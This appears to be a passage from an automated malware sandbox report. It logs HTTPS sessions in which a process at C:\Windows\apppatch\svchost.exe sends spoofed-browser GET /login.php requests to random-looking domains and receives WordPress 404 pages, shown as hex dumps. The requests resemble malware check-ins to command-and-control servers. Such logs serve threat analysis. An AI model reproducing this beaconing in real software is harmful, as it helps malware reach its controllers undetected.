                                                                                                                                                                                                            2024-11-11 17:07:40 UTC1369INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22
                                                                                                                                                                                                            Data Ascii: <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta property="
                                                                                                                                                                                                            2024-11-11 17:07:40 UTC1369INData Raw: 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c
                                                                                                                                                                                                            Data Ascii: ){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,
                                                                                                                                                                                                            2024-11-11 17:07:40 UTC1369INData Raw: 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65
                                                                                                                                                                                                            Data Ascii: eof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(se
                                                                                                                                                                                                            2024-11-11 17:07:40 UTC1369INData Raw: 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69
                                                                                                                                                                                                            Data Ascii: oji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.mi
                                                                                                                                                                                                            2024-11-11 17:07:40 UTC1369INData Raw: 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a
                                                                                                                                                                                                            Data Ascii: iption{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:
                                                                                                                                                                                                            2024-11-11 17:07:40 UTC1369INData Raw: 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72
                                                                                                                                                                                                            Data Ascii: -slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color
                                                                                                                                                                                                            2024-11-11 17:07:40 UTC1369INData Raw: 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                            Data Ascii: gb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-content
                                                                                                                                                                                                            2024-11-11 17:07:40 UTC1369INData Raw: 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77
                                                                                                                                                                                                            Data Ascii: commerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="passw
                                                                                                                                                                                                            2024-11-11 17:07:40 UTC1369INData Raw: 6f 6d 6d 65 72 63 65 2d 45 64 69 74 41 63 63 6f 75 6e 74 46 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 6f 77 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 49 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 73 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 20 6c 69 20 61 3a 66 6f 63 75 73 2c 62 6f 64 79 20 23 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c
                                                                                                                                                                                                            Data Ascii: ommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--default .select2-sel


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.956896188.114.96.34437444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:07:41 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:07:41 UTC951INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:41 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2B9GI8VCCOkAhQFFrFli4ZI4XfGUYlt7f%2FjhVyMUVB6t%2FiXruXl2W6Ecfgg0HbCWsOmjE7Fz0L9TXI7I75MHDoHdgjaDJoRbE0cd3IZeE74i6nnqlbAC%2F8NOe%2FdrlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe146b96d43e2-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=2503025&cwnd=251&unsent_bytes=0&cid=225e217fac765eba&ts=779&x=0"
                                                                                                                                                                                                            2024-11-11 17:07:41 UTC418INData Raw: 37 63 61 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                            Data Ascii: 7ca6<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                            2024-11-11 17:07:41 UTC1369INData Raw: 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72
                                                                                                                                                                                                            Data Ascii: style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta pr
                                                                                                                                                                                                            2024-11-11 17:07:41 UTC1369INData Raw: 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61
                                                                                                                                                                                                            Data Ascii: tion c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canva
                                                                                                                                                                                                            2024-11-11 17:07:41 UTC1369INData Raw: 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e
                                                                                                                                                                                                            Data Ascii: ed"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.
                                                                                                                                                                                                            2024-11-11 17:07:41 UTC1369INData Raw: 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64
                                                                                                                                                                                                            Data Ascii: concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified
                                                                                                                                                                                                            2024-11-11 17:07:41 UTC1369INData Raw: 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74
                                                                                                                                                                                                            Data Ascii: te-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font
                                                                                                                                                                                                            2024-11-11 17:07:41 UTC1369INData Raw: 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65
                                                                                                                                                                                                            Data Ascii: :-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-ne
                                                                                                                                                                                                            2024-11-11 17:07:41 UTC1369INData Raw: 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79
                                                                                                                                                                                                            Data Ascii: tent .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.956920188.114.96.34437444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:07:44 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:07:45 UTC1097INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:45 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
